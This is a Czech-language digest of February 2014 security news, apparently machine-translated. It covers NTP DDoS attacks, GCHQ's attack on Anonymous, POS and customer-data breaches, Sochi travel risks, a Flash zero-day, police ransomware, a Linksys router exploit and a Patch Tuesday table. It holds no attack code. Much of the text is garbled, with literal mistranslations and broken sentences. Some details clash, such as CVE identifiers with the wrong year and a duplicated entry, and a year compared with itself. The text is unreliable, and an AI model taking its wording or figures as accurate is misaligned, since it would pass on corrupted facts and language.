jsou legitimní data přicházející z platných serverů, je obzvláště obtížné blokovat Tyto typy útoků. " oběť je skutečně hit s velkým DDoS útoku . Správci serveru mohou buď zakázat "monlist" v rámci NTP serveru nebo upgrade na nejnovější verzi NTP (4.2.7), který dělá to samé. Pokud chcete vědět, zda váš server (y) jsou zranitelné, můžete použít tento jednoduchý on-line nástroj . Pro více informací o tom, jak NTP-založené DDoS útoky funguje, podívejte se na Cloudflare v blogu od začátku tohoto roku.
GCHQ dávkovat Anonymous "IRC server
12.2.2014 Špionáž
Britská špionážní agentura GCHQ se používá Denial of Service útoků proti Anonymous, aby se narušit jejich komunikaci, jejich činnost, a vést členy volně svázané kolektiv od účasti na DDoS útoků zaměřených na vlády a společnosti, NBC hlášeny . informace o útoku jsou obsaženy v dokumentech exfiltrated NSA informátorů Edward Snowden a sdílet s novináři, v tomto případě prezentace PowerPoint od roku 2012 zaměřena na sdílení úspěch s NSA. Podle dokumentu, útok byl proveden jednotkou GCHQ názvem Joint Threat Research Intelligence Group (JTRIG), a byla zaměřena na IRC server, který hostil chatovací místnosti, kde Anonymní členové shromáždili a vyměňují informace. Podařilo se jim znemožňují přístup na asi 30 hodin. Prior k tomuto, členové JTRIG (pózuje jako ostatní členové Anonymous, samozřejmě) se zapojili do rozhovorů s některými z účastníků, jako je například nechvalně známý LulzSec mluvčí umělecké tvarování keřů a další hackeři, z nichž některé byly nakonec také zatčeni. Podařilo se jim využít informace shromážděné z těchto rozhovorů az zaminované webových stránek, na které lákal cíle, aby pro objevování skutečné-life identitu několika Anonymní členů, které se zabývají krádež dat . Navíc k tomu všemu, JTRIG montáž kampaň zprávy odeslané přes Facebook, Twitter, e-mail, IM a Skype odradit anonymní členům účastnit se útoků DDoS -., a byl zřejmě velmi úspěšný otázka tato odhalení otázka není, zda GCHQ má právo provést tento útok DoS. Agentura tvrdí, že provozovat v mezích zákona a s přísným dohledem, ale zastánci ochrany osobních údajů poukázal na to, že ne všechny Anonymní členové jsou zločinci, a že chatovací místnosti byly také použity k organizování protestů a kampaně, které nejsou ilegální. "Cílení Anonymní a hacktivists částky, které cílení občanům k vyjádření jejich politické přesvědčení, "říká Gabriella Coleman, profesor antropologie na McGill University." Někteří shromáždili kolem jména, které se zapojily do digitálního občanské neposlušnosti, ale nic, co vzdáleně připomínalo terorismu. Většina z těch, objetí Myšlenka především pro běžné politické vyjádření.
Bílé Ubytování potvrzuje porušení systém POS v 14 hotelů v USA
12.2.2014 Incidenty
Hotel management firmy White Ubytování potvrdila, že utrpěl porušení bodu prodejních systémů a vydala další informace o vyšetřování. "White Ubytování spravuje hotely na základě dohod s majiteli hotelu a je odlišný a samostatný subjekt od konkrétní značky ubytované, "oni byli jisti, počítejte s tím, a sdílené, že systémy v restaurací a salonků v 14 hotelů v USA, které byly ohroženy v období od března 20 a 16 prosince 2013. Celý seznam lze nahlížet tady , a je zajímavé poznamenat, že nejen Marriot hotely byly ovlivněny. "Hosté v hotelu, který neměl používat své kreditní karty v těchto prodejnách, a hosté, kteří si zakoupili pro své pokojové účtu na těchto prodejnách, nebyly ovlivněny," oni rozdělili, s výjimkou Radisson hvězda Plaza v Merrillville, Indiana , kde je systém správy majetku, který spravuje hotelové hosty "údaje o kreditní kartě se zdá také mohla být ohrožena. Informace ohrožena v rozporu je, že vázána na zákazníka platebních karet (jméno, číslo, bezpečnostní kód, datum vypršení platnosti), takže návštěvníci na těchto hotelů během výše uvedeného období jsou vyzýváni, kontrolovat jejich prohlášení karty, a bude přijímat jeden rok služby osobní ochrany identity zdarma. Firma slíbila, že další informace o incidentu ihned sdílet.
Cyber rizika čekají na návštěvníky a diváky v Soči 2014 olympijských her
12.2.2014 KyberSecurity
Zimní olympijské hry 2014 jsou stanoveny začít v pátek v Soči, ruské město nacházející se na pobřeží Černého moře.
Tam bylo mnoho spory týkající se této volbě hostitelského města (a země), ale také, pokud jde o očekávané deka komunikační dohled - komunikace odposlech, kolekce metadata, atd. -., že Rusko se bude platit během hry US CERT byl zveřejněn na Úterý sada tipů jak pro diváky a cestující do Soči o rizicích spojených s kybernetickými by měly brát v úvahu. Zatímco hacktivist činnost není něco, co by se měly týkat se, vládní dohled je. "Rusko má národní systém zákonného odposlechu všechny elektronické komunikace. Systém operativních-vyšetřovacích opatření, nebo SORM, právně umožňuje ruská FSB sledovat, zachytit a blokovat veškerou komunikaci odeslána v elektronické podobě (tj. mobilní telefon nebo volání na pevné linky, internetového provozu, atd.), "vysvětlili. "Zprávy o Rostelecom, ruská národní telekomunikační operátor, instalace hloubkovou inspekci paketů (DPI) znamená, že úřady mohou snadno použít klíčová slova, vyhledávat a filtrovat komunikaci. Proto je důležité, aby účastníci pochopili komunikaci, zatímco na hry by neměly být považovány za soukromé." Oni také varoval před možností libovolného počítače nebo softwaru, který obsahuje citlivé nebo šifrovaných dat jsou zabavené ruskými orgány, které se odchylují od země. "Cestující může zvážit opuštění osobních elektronických zařízení (např. notebooky, smartphony, tablety), doma nebo alternativně přinést zapůjčení náhradního zařízení, která nejsou již ukládají citlivá data o nich, a může být vymazán po návratu do své domovské země. Pokud se jednotlivci rozhodnou přivést své osobní zařízení, zvážit všechny komunikace a soubory na nich být náchylné k odposlechu nebo propadnutí, "se ukázal ven. Dalším typem hrozby pochází z kybernetických podvodníků a podvodníky, kteří chtějí využít obrovského celosvětového zájmu v hrách. uživatelů internetu se doporučuje dávat pozor při prohlížení v přímém přenosu, opakování události, nebo kontrolní statistiky medaili on-line. "Události, které získají významný veřejný zájem a ve sdělovacích prostředcích se často používají jako návnady pro spam či spearphishing kampaní. Škodlivé aktéři mohou rovněž vytvářet falešné webové stránky a domény, které se zdají být oficiální olympijský novinky a zpravodajství, které mohou být použity k doručení škodlivého softwaru koncového uživatele při návštěvě webu , "oni si všimli. "Diváci by měli mít na pozoru před jakýkoliv jiný zdroj tvrdí, že poskytnutí přímé přenosy. Jako vždy, je nejlepší navštívit důvěryhodných zdrojů přímo, spíše než kliknete na e-mailem odkazy nebo otevírání příloh." Kromě toho, pokud hledáte koupit lístky, použijte nástroj Kontrola webových stránek (na konci této stránky ), aby zjistili, zda webové stránky, které plánujete koupit vstupenky ze je Authorised Ticket Reseller. NBC News má krátkou zprávu o nebezpečích návštěvníci čelí pomocí jejich zařízení Internet-umožnil, ale bohužel nejde příliš do detailů o tom, jak kompromisy se stalo. ale nebezpečí je reálné: z nezabezpečených veřejných WiFi sítí a nepoctivými přístupových místech; útoky Bluetooth, škodlivé nabíjecí stanice, až se zlými úmysly stažení maskuje jako aktualizace nebo záplaty a krádeži. Vlastně, to nejlepší, co dělat, pokud si nejste tech-důvtipný, je to, aby svůj vlastní telefon nebo notebook s vámi vůbec, nebo přinést to, ale před návštěvou vyčistěte důkladně každého kusu citlivých informací . Vypnout Wi-Fi, Bluetooth a NFC na zařízení, se nelze přihlásit do citlivých účtů, když jste tam, nepřijímáme nevyžádané stahování, a ne (pokud to může pomoci) používat třetí stranou nabíjení nebo skladovací služby.
Google ups odměny pro software třetích stran náplastí
12.2.2014 Zranitelnosti | Bezpečnost
Google se neustále vylepšování své chyby odměnu a oprava věrnostní program , a poslední změna spočívá dalšího rozšíření působnosti a odměn částka zvyšuje. "Ode dneška budeme rozšiřovat rozsah našeho zranitelnost věrnostní program také zahrnuje všechny aplikace Chrome a rozšíření vyvinuté a označen jako "Google" , oznámil Eduardo Vela Nava a Michal Zalewski z týmu Google Security Team. "Myslíme si, že rozvoj Chrome rozšíření bezpečně je poměrně snadné (vzhledem naše zásady bezpečnosti jsou dodržovány), ale vzhledem k tomu, že rozšíření, jako jsou setkání a GMail jsou široce použít, chceme, aby se ujistil úsilí, aby jejich bezpečné odpovídajícím způsobem odměněn. " Odměny zůstávají stejné -. mezi $ 500 až $ 10.000 zranitelnosti v závislosti na závažnosti jeho vlivu Je to v poslední době představil experimentální oprava odměn programu pro podporu výzkumných pracovníků, vytvořit bezpečnostní opravy pro software třetích stran, který odměny byly zvýšeném. Zpočátku, po jejich podání byl přijat a zahrnut do konečného kódu softwaru, Google bude odměňovat výzkumníky s částkou mezi $ 500 až $ 3,133.7. Nyní, rozsah je vyhrazeno pro podání nabídek, že "jsou velmi jednoduché, nebo které nabízejí jen velmi spekulativní zisky," zatímco 5000 dolar bude rozdávat za "středně složité opravy, které poskytují přesvědčivé bezpečnostní výhody," a 10.000 dolary za "složité, zlepšení vysokým dopadem, který téměř jistě brání slabiny v postiženém kódu.
Adobe Flash chyba využívány v přírodě, nyní aktualizovat
12.2.2014 Zranitelnosti
Adobe vydala nouzovou opravu pro kritickou zranitelnost postihuje Flash Player pro Windows, Linux a OS X, využívání, které může mít za následek útočník získává dálkové ovládání systémů obětí.
Podle Adobe bezpečnostní poradenství , chyba je aktivně využíván ve volné přírodě, ale na rozdíl od připsání svůj objev vědců Alexander Polyakov a Anton Ivanov společnosti Kaspersky Lab, se žádné podrobnosti o probíhajícím útoku byly sdíleny. příspěvek zveřejněný v pondělí na Kaspersky Lab Securelist blog ukazuje, že jejich vědci odhalili nový sofistikovaný cyberespionage operaci, která, mimo jiné, byl schopen ohrozit Mac a počítače se systémem Linux. Zdá se pravděpodobné, že chyba Flash je mezi těmi zadlužuje útočníky, ale vyhráli jsme "Nevím jistě, dokud další podrobnosti o této operaci jsou sdíleny příští týden. , ale neměli byste čekat realizovat opravu. Pokud používáte Adobe Flash Player 12.0.0.43 a starší verze pro Windows a Macintosh nebo Adobe Flash Player 11.2.202.335 a starších verzích pro Linux, navštivte Adobe Flash Player Download Center a vyberte ji. Pokud používáte Flash vložený v Chrome, nebo Internet Explorer , aktualizujte svůj prohlížeč na nejnovější, non-zranitelných verzí. UPDATE: výzkumníci společnosti Kaspersky Lab vydala další technické podrobnosti .
Policie ransomware: mnohamilionové podnikání
12.2.2014 Viry
Evropské centrum pro boj proti kyberkriminalitě Europolu zveřejnila své posouzení hrozeb na policejní Ransomware - třídu počítače malware, který viděl exponenciální růst v Evropské unii v posledních dvou letech.
Výsledkem společné iniciativy mezi Evropskou kyberkriminalitě centra (EC3) a nizozemského národního High Tech Crime Unit (NHTCU) se tato zpráva si klade za cíl zvýšit povědomí o ransomware, a také identifikovat příležitosti pro mezinárodní intervence donucovacích orgánů a operativní koordinace. Policie Ransomware je druh online podvody používají zločinci vydírat peníze prostřednictvím nasazení malware. Malware zakáže funkčnost počítačů obětí a zobrazí se zpráva požadující zaplacení výkupného získat přístup ke svým strojům. se Ransomware zprávy za cíl, aby se z donucovacích orgánů, a obviňují oběť provádět on-line činnosti, jako je nelegální soubor sdílení, přístupu k materiálu, zneužívání dětí, nebo navštívit teroristické webové stránky. Zločinci používají skutečné vymáhání práva agentura loga půjčovat autoritu svých zpráv a nutit oběti na zaplacení výkupného, aby odhalili jejich počítačů. Ačkoliv přesný počet obětí policejní ransomware v EU je obtížné posoudit, odhaduje se, že miliony počítačů mají byl napaden a desítky tisíc občanů zaplatil požadavky výkupného. Je milióny euro obchod pro zločince podílejí. Tyto cybercriminal činnosti jsou usnadněny podzemními on-line fóra, které poskytují Ransomware zdrojového kódu, infrastrukturu pro distribuci malwaru a praní špinavých peněz služeb "proplacení z" nedovoleného výnosy získané prostřednictvím on-line předplacené řešení a virtuální měny. . Ransomware "kity" znamená, že útoky mohou být snadno nasazeny a již nejsou omezeny na technicky zdatné Nové formy ransomware se objevují - například Cryptolocker - což může mít ještě větší dopad na jednotlivce a podniky, protože riskují trvalou ztrátu jejich dat a soubory. Počítačoví zločinci se bude rozšiřovat síť obětí zaměřují se na nové trhy, zaměřující se na různé operační systémy a zařízení. distribuce Ransomware herců a infrastruktury v celé řadě právních řízeních komplikuje policejní vyšetřování, a tudíž zlepšení spolupráce a výměna informací mezi donucovacími orgány a soukromými partnery je nezbytné . boj proti počítačové trestné činnosti tohoto jevu Troels Oerting, ředitel Evropského centra pro boj proti kyberkriminalitě řekl: "Malware útoky v podobě ransomware se bohužel zvýší. Je to "dojná kráva" pro trestní podniků, snadné použití a obtížné pro oběti na ochranu proti. Všechny druhy nevinných uživatelů jsou potenciální oběti tohoto trestného činu - a to nejen tradiční uživatelé, ale také podniky a veřejné služby. EC3 bude i nadále pomáhat členským státům EU donucovacím orgánům v boji proti této trestné činnosti a sledování se výnosů z trestné činnosti. Mezitím jsme se všichni musíme zvýšit povědomí mezi všemi uživateli internetu, aby se zabránilo dalšímu dopadu. Je třeba dodržovat několik pravidel - jeden je zajistit, aby jste vždy zálohovaná ".
Nedostatek dovedností, které brání AppSec programy
12.2.2014 Bezpečnost
Pokračující nedostatek dovedností v oblasti zabezpečení aplikací je silně brzdí provádění účinných AppSec programů, podle SANS.
Aplikace Bezpečnostní programy a postupy průzkum 2014 dotazovány 488 IT a bezpečnostních profesionálů o současném a budoucím stavu zabezpečení aplikací v jejich organizacích. "Jedna věc, která stojí v letošním roce je nárůst počtu organizací s formálním zabezpečení aplikace programu v místě . Přibližně 83% respondentů (oproti 66%) mají program AppSec na místě, a více než 37% (oproti 33%) mají program, který působí již více než pět let, "říká SANS analytik Frank Kim. "To znamená, že hodně pokročili, ale také zdůrazňuje, že je potřeba dělat mnohem více." V průzkumu, více než 35% respondentů testování bezpečnosti svých kritických podnikových aplikací průběžně, a to až z 23% v loňském průzkumu. A, povzbudivě, pouze malé procento (méně než 3%) respondentů odešel zabezpečení aplikací náhodě a netestovali vůbec. Průzkum zjistil, že nedostatek kvalifikovaných pracovníků a nedostatečnou kvalifikací jsou považovány za hlavní inhibitory zahájení AppSec programy. "Letošní průzkum přináší cenné a překvapivé pohledy na problémy, které organizace čelí dnes při provádění úspěšné AppSec programu," říká SANS analytik Jim Bird. "Je to nejen finanční prostředky, a dostat management buy-in there-are další, zásadní problémy, včetně nedostatku dovedností, které brání lidem z péče o bezpečnost, kde se dělá nejvíce rozdíl, předem v návrhu a vývoje.
DDoS útoky používané k ovlivnění cen akcií
12.2.2014 Počítačový útok
Prolexic Technologies sdílí analýzu téměř tuctu globálních útoků DDoS , které označuje počítačoví útočníci se pomocí DDoS útoků ve snaze ovlivnit tržní hodnoty a zasahovat do výměny platformy.
"Typicky, DDoS útoky jsou zahájeny na pohonné hmoty veřejnou diskusi, nebo po pomstě, vydírání a vydírání - ale to se mění,". Řekl Stuart Scholly, prezident Prolexic "Během několika posledních let zejména DDoS útok kampaně představuje významný hrozbu pro odvětví finančních služeb, jakož i jiných veřejně obchodovaných firem a obchodních platforem. Jako součást našich DDoS útok forenzní, jsme odhalili znepokojivý trend: Mnoho z těchto zákeřných útoků se jeví záměr na snížení u cíle cenu akcií nebo měn, nebo dokonce dočasně zabránit obchodů od odehrává, "dodal Scholly. veřejný obraz globální obchodní nebo finanční služby, je úzce spojena s jeho kybernetickém přítomností. Užívání veřejně obchodované firmy nebo platforma pro výměnu v režimu offline - a šíří zvěsti, že vyvolávají otázky o jeho schopnosti podnikat on-line - může vytvářet falešné nebo zavádějící vystoupení. To je znakem manipulace s trhem. "Několik specifických Cyber-teroristické skupiny jsou zodpovědné za většinu z těchto útoků. Zatím nebyli úspěšní v přinášení se celý velký trh, "vysvětlil Scholly. "Ale DDoS útoky, aby stále větší, silnější, delší a složitější, takže nemůžeme usnout na vavřínech. A co víc, je riziko přesahuje skutečnou výpadku - sociální média tlachání a mediální pokrytí může zesílit vnímaný efekt, narušení a poškození způsobené kybernetický útok kampani ".
Většina dospělých sdílet intimní informace prostřednictvím nezabezpečených digitálních zařízení
12.2.2014 Bezpečnost
McAfee zkoumala, jak více než 1500 spotřebitelů jsou sdílení a ukládání intimních dat na svých mobilních zařízeních, a to zejména se současnými nebo bývalými významných druhých. Sdílení osobní obsah jako jsou sugestivní texty, nahé fotky, sugestivní video a hesel na těchto zařízení může potenciálně vést k cyber-stalking a expozice soukromého obsahu úniku on-line. Zatímco 98% respondentů využívá jejich mobilní zařízení fotit, 54% send nebo přijímat intimní obsahu, včetně videa, fotografií, e-mailů a zpráv. Z dotázaných, 69% je zajištění jejich smartphone s heslem nebo heslem, zvýšení 30 procentních bodů z loňského výsledku. Nicméně, 46% dospělých v USA stále sdílejí svá hesla s jinou osobou (pokles z 54%), zatímco 42% používat stejné heslo na více zařízeních, čímž se zvyšuje pravděpodobnost, že tato mobilní zařízení se stane pirát. "Se všemi příběhů" jsem slyšel o intimní fotky jsou unikla, to je těžké uvěřit, že lidé jsou stále sdílí svá hesla, "řekl Gary Davis, viceprezident společnosti McAfee spotřebitele podnikání. "Nakonec, oni jsou rostoucí rizika z těchto fotografií se stal veřejným a možná ohrožení jejich identity a pověsti. Spotřebitelé musí přijmout opatření a používat mobilní bezpečnosti, aby zajistily, že to, co by mělo být soukromé pobyty soukromé. " McAfee radí spotřebitelům, aby sdílení hesel nebo kódů pro mobilní zařízení s ostatními, které pomohou udržet svůj obsah v bezpečí. Mobilní uživatelé by se měli vyhnout používání slabá hesla, které lze snadno určit, jako jsou narozeniny, čísla v řádku nebo opakujících se čísel pro jejich zařízení. Spíše šestimístná hesel a slov převést na čísla pomocí mobilního klávesnice jsou silnější a je třeba využít. jen pro vaše oči Sedmdesát procent z 18 - 24 letých receive se sexuálním podtextem obsahu od někoho, největší procento všech věkových skupin. Další lidé jsou pravděpodobně používat své mobilní zařízení k odesílání a přijímání podobný obsah (61% mužů vs 48% žen). Čtyřicet pět procent dospělých v USA tvrdí, že uložené intimní obsah, který jste obdrželi ve srovnání s 40% těch, kteří ukládat nemorální fotky, videa nebo zprávy, které jste odeslali. Z těch, kteří poslali intimní nebo pikantní obsah, 77% z nich poslali tento obsah na jejich významný jiný, zatímco u 1 z 10 jedinců jste odeslali uživateli podobný obsah na úplně cizí. mezeru Ochrana osobních rovnosti Podle průzkumu, více mužů než žen chránit své mobilní zařízení (74% mužů vs 65% žen). Vzhledem k tomu, že snaha chránit své mobilní zařízení a jeho obsah více než dvě třetiny lidí zájem o koupi biometrické zabezpečení, vestavěné funkce (např. rozpoznávání obličejů, rozpoznávání hlasu, rozpoznávání otisků prstů, atd.) případ ex Zatímco 96% z USA dospělí dotazovaní důvěřovat své významné druhé s intimním obsahem nebo jinak soukromé informace, které jste poslal, pouze 32% se zeptal svého partnera odstranit informace při ukončení vztahu. Kromě sdílení hesel, 50% podíl na obsah mobilní telefon a 48% podíl e-mailových účtů. Přesto, čtvrtina respondentů vzali mobilní zařízení svého partnera vidět další obsah uložený na něm, včetně zpráv a fotografií. Jeden z pěti lidí, je pravděpodobné, že k přihlášení do Facebooku v úvahu jejich významný jiný je alespoň jednou za měsíc, a jen 30% dotázaných připustila, aby sledoval jejich významný jiný ex na sociální média, s 18 až 24 roky a starší koně je horní věková skupina. Veřejné vystavení on-line náklonnosti S 91% respondentů na sociální mediální platformu (např. Facebook, Twitter, Instagram), z těch, kteří odpověděli, že budou slavit Valentýna na sociální média, 76% respondentů plánuje posílat zprávy ostatním při 58 % zaúčtuje fotografií. Z těch, kteří odpověděli, více žen než mužů, v plánu oslavit svou lásku na sociální média na Valentýna (80% žen vs 72% mužů).
Podezření Mass Exploit Against Linksys E1000 / E1200 routery
12.2.2014 Počítačový útok
Brett, který provozuje ISP ve Wyomingu, oznámila nám, že měl počet zákazníků s compromissed Linksys routery těchto posledních dnech. Směrovače, jakmile compromissed, skenování portů 80 a 8080 tak rychle, jak oni mohou (nasycení šířku pásma k dispozici).
Není jasné, které zranitelnost je využívána, ale Brett odstraněny slabá hesla. E1200 routery s nejnovější firmware (2.0.06) se zdají být imunní proti působení exploit používané. E1000 routery jsou na konci životnosti, a nezdá se, že se imunitní firmware k dispozici.
Jako ukazatelů, podívejte se na E1000/1200 routery, které skenovat IP adresy postupně na portu 80/8080. Některé routery mohou být změněna nastavení DNS poukázat na DNS serveru Google (8.8.8.8 nebo 8.8.4.4).
Pokud máte nějaké poznatky, dejte nám prosím vědět.
02. 2014 Microsoft Patch Tuesday
11.2.2014 Zranitelnosti
Přehled 02. 2014 Microsoft záplaty a jejich stav.
# Ovlivněno Kontraindikace - KB Známé Využije Hodnocení Microsoft (**) ISC hodnocení (*)
klienti servery
MS14-005 Přístup k informacím Chyba zabezpečení ve službě Microsoft XML kód Services
(Nahrazuje MS10-051 )
Microsoft XML Core Services CVE-2014-0266
KB 2916036 Ano. Závažnost: Důležité
zneužitelnosti: 3 Důležitý Důležitý
MS14-006 IPv6 Denial of Service
(nahrazuje MS13-065 )
TCP / IP Stack (IPv6) CVE-2014-0254
KB 2904659 Ano. (Vuln. známo) Závažnost: Důležité
zneužitelnosti: 3 Důležitý Důležitý
MS14-007 Vzdálené spuštění kódu v Direct2D
(Nahrazuje)
Direct2D CVE-2014 až 0263
KB 2912390 Ne. Závažnost: Kritická
zneužitelnosti: 1 Kritický Důležitý
MS14-008 Umožnit vzdálené spuštění kódu v aplikaci Microsoft Forefront
(nahrazuje)
Microsoft Forefront CVE-2014-0294
KB 2927022 Ne. Závažnost: Kritická
zneužitelnosti: 1 N / A Kritický
MS14-009 Zvýšení úrovně oprávnění chyby zabezpečení v rozhraní. NET Framework
(Nahrazuje MS13-052 , MS11-100 )
. Net Framework CVE-2014-0253 CVE-2014-0257 CVE-2014-0295
KB 2916607 Ano. Závažnost: Důležité
zneužitelnosti: 1 Důležitý Důležitý
MS14-010 Kumulativní aktualizace zabezpečení pro aplikaci Internet Explorer
(nahrazuje MS13-097 )
Internet Explorer CVE-2014-0267 CVE-2013-0268 CVE-2013-0269 CVE-2013-0270 CVE-2013-0271 CVE-2013-0272 CVE-2013-0273 CVE-2013-0273 CVE-2013-0274 CVE-2013-0275 CVE-2013-0276 CVE-2013-0277 CVE-2013-0278 CVE-2013-0279 CVE-2013-0280 CVE-2013-0281 CVE-2013-0283 CVE-2013-0284 CVE-2013-0285 CVE-2013-0286 CVE-2013-0287 CVE-2013-0288 CVE-2013-0289 CVE-2013-0290 CVE-2013-0293
KB 2909921 Ano
(CVE-2014-0267) Závažnost: Kritická
zneužitelnosti: 1 Patch TEĎ! Důležitý
MS14-011 Vzdálené spuštění kódu v jazyce VBScript skriptování
(nahrazuje MS10-022 )
VBScript CVE-2014-0271
KB 2928390 Ne. Závažnost: Kritická
zneužitelnosti: 1 Kritický Kritický
Windows, IE, Java jsou nejzranitelnější
11.2.2014 Zranitelnosti
Při srovnání s čísly z předchozího roku 2013 došlo k nárůstu v zjištěnými chybami zabezpečení, a co víc, řada kritických zranitelností se také zvýšil -. Když je to podstatně menší než v roce 2009 researchers GFI have pročesána podrobnosti poskytovaných Vulnerability Database US National (NVD), a zjistili, že v roce 2013, v průměru 13 nových zranitelností byly hlášeny každý den, přinášet úhrn k 4794 -. 447 více než v roce 2013, 50 procent z chyb bylo nalezeno v produktech pouze 10 dodavatelů z 760:
Čísla jsou tak dokladem toho, že množství různých nabídek tyto velké firmy mají a na jejich popularitě, které se přirozeně ukazuje na to, že jsou častěji terčem hackerů a analyzovány výzkumníky bezpečnosti pro bezpečnostní nedostatky. Oracle je na špičce seznamu není jen proto, že Java zranitelnosti, ale také z důvodu hardwarových chyb nalezených v podnikových zařízeních. Přesto, že Microsoft nemůže povzdech povzdech ot úlevu, protože společnost měla obrovský nárůst "vysoce rizikových" zranitelností ve srovnání s 2012 čísly. Kritické zranitelnosti nalezené v jeho různých operačních systémů z Microsoft obsadit 8 prvních 9 míst na seznam většiny cílových operačních systémů v roce 2013:
A konečně, Microsoft Internet Explorer, Oracle Java a Google Chrome skončil obsazení prvních tří míst (v tomto pořadí) na seznamu nejvíce cílených aplikací. "Z bezpečnostního hlediska, Oracle a Java měla špatný rok, v roce 2013 se 193 chyb než pro Java, 102 z nich kritické, " poznamenal GFI křesťanskou Florian. "Aby toho nebylo málo, vysoký počet kritických zranitelností v Javě byly nulové dny nedostatky." Další věc, vzít v úvahu, je skutečnost, že počítačoví útočníci mají přednost využívání Java zranitelnosti, protože software lze nalézt na mnoha počítačů, kteří provozují různé operační systémy. zachování všech na tuto skutečnost, nejlepší rada, se můžete dostat k bezpečnému uchování je i nadále udržet váš operační systém, aplikace a bezpečnostní software aktuální, a odebrat software který nepoužíváte, nebo je potřeba tak, aby se minimalizovalo útoku.
Cílová obhajuje čipové karty v důsledku porušení
11.2.2014 Bezpečnost | Kriminalita
Nedávná lavina porušení, která vyústila v řádu desítek milionů platebních karet je ohrožena již potřásl jak maloobchodní trh v USA a zákazníky. Přes následné zjištění, že Neiman Marcus , Michaels Stores a další prodejci byli zasaženi stejným způsobem (s POS paměti -škrábání malware ), množství informací o kreditní kartě ukradený v cílové porušení dělal to ten, který zachytil pozornost amerických nakupujících nejvíce. A někteří z nich ztratili důvěru ve schopnosti maloobchodníků k ochraně svých dat a se vrátil platit v hotovosti, ostatní jsou stále chválit pohodlí platebních karet. ale pro Target, prodejce dobře-známý pro svou rozsáhlou zákaznickou sběru dat a data mining, na skutečnost, že její zákazníci mohli vybrat, aby zanechat stopu svých nákupních zvyklostí je něco, ale dobrou zprávou. Přidejte k tomu skutečnost, že společnost je již při pohledu na dvou žalob a soudních procesů podaných proti nim v důsledku porušení, a že slyšení o něm byly naplánovány s senátní bankovní podvýboru, a není divu, že společnost byla nucena do full-na režimu kontroly poškození. John Mulligan, Target Chief Financial Officer, napsal svůj názor, kus pro The Hill vyzývající ke změně: nadešel čas pro americké platebních karet společností a podniků k přechodu na čipu s podporou čipové karty. On je jen částečně pravdu. Doba těchto čipových karet bylo dávno, pouze náklady na celostátní zavedení byl vyšší než z různých důsledků tohoto typu porušení. "Na cíl, jsme pracovali několik let na cestě k přijetí této technologie . Vzhledem k porušení, jsme urychluje vlastní 100.000.000 dolarů investic dát čip s podporou technologie na místě, "Mulligan sdílený s tím, že jejich cílem je implementovat tuto technologii ve svých obchodech a na svých vlastnických REDcards počátkem roku 2015. Má to opravdu trvat tak dlouho, implementovat technologii, která se ukázala být bezpečnější a byl široce používán v EU, Velké Británii a Kanadě let? Zdá se, že ano. "Důvodem Spojené státy pomalu přijmout změnu je, že všichni hráči v systému plateb - obchodníci, emitenti, banky a sítě - nebyli schopni najít společnou řeč o tom, jak se podělit o náklady na realizaci , "říká. Předpokládám, že to není jen důvod, ale důvod. "Asi před 10 lety, Target pilotoval časnou generaci technologie čipu povoleno na cílové VISA REDcard, se smíšenými výsledky. Pozoruhodně, že karty byly mnohem dražší Vyrábíme a vyžaduje výměnu ukládání cardreadery, "sdílené Mulligan. "Také technologie v té době by byly pouze použitelné v našich prodejnách, takže pro matoucí zážitek pro zákazníky, celkově. Po třech letech na vlastní pěst, jsme přerušit program." Má pravdu v tom, že změna musí se stalo, a že všichni hráči musí zapojit. Otázkou je, zda se náklady na změny stávají méně než náklady (finanční, pověsti) z porušení pro každého? Pochybuji o tom. InfoWorldu Paul Venezia je dobrý nápad: rozdělovat velké pokuty pro velké porušení. "V každém případě, maloobchodníci vyjádřit svůj zármutek a soucit, a slibují, že ne aby se to stalo znovu, ale to se nestane,". poukazuje. "Target bude mít nějaký negativní publicitu pro chvíli, ztratit některé prodeje, a vrátit se do práce jako obvykle. "JP Morgan odhaduje, že Target porušení by mohlo vzniknout škody ve výši až 18 miliard dolarů, což" poznamenal. "Pokud společnost měla . náhradu ve výši 18 miliard dolarů škody, dobře, že by mohla učinit prohlášení " On také předložit jinou alternativu: vykonatelný opt-out volbu pro zákazníky, kteří nechtějí, aby se jejich osobní, finanční a transakční informace shromážděné kdokoli první místo. Bohužel, nevidím to děje, v blízké nebo vzdálené budoucnosti.
Osobní info 800000 Orange zákazníků ohrožena
11.2.2014 Kriminalita
Globální telekomunikační gigant Orange vyslal upozornění na téměř 800,000 (asi 3 procenta) na svých francouzských zákazníků, varuje, že jejich osobní údaje byly ohroženy v porušení, která se konala 16. ledna.
Ukradl data zahrnují zákazníků jméno, poštovní adresu, e-mailovou adresu, telefonní číslo a další informace o složení domácnosti, počtu upsání členů domácnosti mají s Orange nebo konkurenty, a zákazníků preference o tom, jak být kontaktován . narušení byla ukončena bezprostředně po odhalení, a ohrožena webové stránky - "Můj účet" v klientské oblasti Orange.fr stránek -. offline na chvíli firma říká, že hesla nebyla ohrožena, ale varuje Uživatelé, že informace, které byly ukradeny je velmi užitečné pro montáž na phishingové útoky. Vysvětlili, proč phishing útok, a vyzval dotčené zákazníky, aby se na pozoru, že se blíží prostřednictvím e-mailu, SMS nebo telefonicky. PC INpact (via Google Translate) uvádí, že všichni francouzští zákazníci a ne jen ty, jichž se týká porušení již obdržel varování phishing kolem January 23, ale že jeden nezmínil o vniknutí. Úřady mu bylo oznámeno porušení a vyšetřuje ji, ale žádné další podrobnosti o tom, jak to bylo provedeno byly sdíleny.
Hackeři žalovat německou vládu o pomoc NSA špehovat své občany
11.2.2014 Špionáž
Chaos Computer Club (CCC), největší asociace hacker Evropy, a Mezinárodní liga pro lidská práva (ILMR) žalují německou vládu za údajné pomoci zahraničních zpravodajských agentur tajně sledovat německé občany. "Po měsících tiskových zpráv o hromadný dozor ze strany tajné služby a urážlivé útoky na systémy informačních technologií, máme jistotu, že tajné služby Německa a dalších zemí porušil německý trestní zákon, "řekli ve veřejném prohlášení . "S tímto trestní oznámení, doufáme, že se konečně zahájit vyšetřování prováděném Spolkový generální prokurátor proti německé vládě. CCC se naučil s jistotou, že vedoucí představitelé tajných služeb a federální vlády pomáhali a naváděl páchání těchto trestných činů. " stížnost podána u úřadu spolkového generálního prokurátora tvrdí, že federální vláda, předsedové německých tajných služeb, německými vyzvědači a jejich orgány dohledu, německý ministr vnitra, stejně jako německá Chancelor Angela Merkelová buď se zúčastnil nebo pomáhal "nelegální a zakázané tajné zpravodajské činnosti", které porušily právo na soukromí německých občanů . "Je politováníhodné, že odpovědné osoby a okolnosti jejich zločiny nebyly zkoumány," říká Dr. Julius Mittenzwei, právník a člen CCC. skupina se rovněž žádá, aby Edward Snowden být volán jako svědek, a musí být umožněno do Německa pro tento účel a 